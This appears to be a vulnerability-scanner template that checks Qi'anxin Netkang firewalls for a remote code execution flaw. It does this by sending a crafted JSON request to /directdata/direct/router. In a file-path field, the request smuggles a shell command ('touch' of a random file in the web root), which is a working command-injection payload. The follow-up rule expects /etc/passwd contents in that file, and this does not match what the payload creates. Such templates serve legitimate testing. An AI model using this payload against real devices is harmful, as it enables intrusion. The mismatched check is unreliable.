id: qi-anxin-netkang-next-generation-firewall-rce

info:
  name: Qi'anxin Netkang Next Generation Firewall - Remote Code Execution
  author: pikpikcu
  severity: critical
  description: |
    Qi'anxin Netkang Next Generation Firewall is susceptible to remote code execution.
  reference:
    - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g

set:
    randstr: randomLowercase(20)
rules:
    r0:
        request:
            method: POST
            path: /directdata/direct/router
            body: |
                {"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;touch /var/www/html/{{randstr}}.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}
        expression: response.status == 200
    r1:
        request:
            method: GET
            path: /{{randstr}}.txt
        expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0() && r1()

